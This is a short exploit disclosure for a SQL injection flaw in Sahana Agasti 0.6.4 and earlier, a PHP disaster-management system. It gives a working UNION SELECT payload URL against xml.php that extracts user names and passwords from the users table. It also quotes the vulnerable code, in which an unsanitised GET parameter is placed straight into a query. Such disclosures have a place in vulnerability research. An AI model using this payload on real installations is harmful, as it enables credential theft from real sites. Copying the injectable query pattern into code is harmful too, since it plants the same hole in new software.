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[ Discovered by dun \ posdub[at]gmail.com ]
#[ Sahana Agasti <= 0.6.4 ]SQL Injection Vulnerability #
# Script: "Agasti is the PHP based project of the Sahana Software Foundation.
#Based a long-term preparedness for disaster management..."
# Script site: http://www.sahanafoundation.org/
# Download: https://launchpad.net/sahana-agasti/
# [SQL] Vuln:
# http://site.com/agasti/sahana-0.6.4/www/xml.php?act=add_loc&sel=1/**/UNION/**/SELECT/**/null,concat(CHAR(60,66,82,62),concat_ws(char(58),user_name,password)),null/**/FROM/**/users
# Bug: ./sahana-0.6.4/www/xml.php (lines: 17-21, 200-223)
# ...
# $act=$_GET{"act"};//
# if($act=='add_loc') // (1)
# {
# _shn_get_level_location();//
# ...
# function _shn_get_level_location(){
# require_once('../3rd/adodb/adodb.inc.php');
# require_once('../conf/sysconf.inc.php');
# //Make the connection to $global['db']
# $db = NewADOConnection($conf['db_engine']);
#$db ->Connect($conf['db_host'].($conf['db_port']?':'.$conf['db_port']:''),$conf['db_user'],$conf['db_pass'],$conf['db_name']);
# $level=$_GET{"sel"};// (2)
# if($level==1){
# echo "none,";
# }
# $q = "SELECT location.name,location.loc_uuid,parent_id FROM location WHERE location.opt_location_type={$level}";// (3) SQL
# $res_child=$db->Execute($q);
# if($res_child->EOF)
# return;
# while(!$res_child->EOF){
# $res=$res.",".$res_child->fields[1];
# $res=$res.",".$res_child->fields[0];
# echo $res;// (4)
# }
# ...
[ dun / 2011-01-01 ]